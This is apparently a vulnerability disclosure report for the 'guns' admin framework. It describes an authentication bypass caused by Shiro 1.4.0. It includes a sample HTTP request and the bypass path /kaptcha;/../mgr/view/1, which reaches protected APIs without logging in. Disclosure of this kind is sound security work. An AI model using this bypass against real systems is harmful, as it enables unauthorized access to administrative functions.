Description
[Suggested description]
guns was found to have an Incorrect Access Control vulnerability due to the use of an insecure version of Shiro.
[Vulnerability Type]
Incorrect access control
[Vendor of Product]
https://github.com/qiguliuxing/guns
[Affected Product Code Base]
all version (<= V2.5)
[Affected Component]
APIs that require authentication
[Attack Type]
Remote
[Vulnerability details]
Directly send the payload below to the API /mgr/view/1 will be redirected to login page because of the authentication.
GET /mgr/view/1 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: 127.0.0.1:8081
Connection: keep-alive
Cookie: shiroCookie=74236b0c-d42d-44eb-8e04-4a94db77e003
Referer: http://127.0.0.1:8081/mgr/view/1
However, send the payload below to the API /kaptcha;/../mgr/view/1 will bypass the authentication.
[Cause of vulnerability]
Shiro is used for authentication in guns, but version 1.4.0 contains an insecure implementation.
Meanwhile, guns includes some API configured without permission requirements, enabling the exploitation of vulnerabilities in Shiro's implementation to achieve authentication bypass.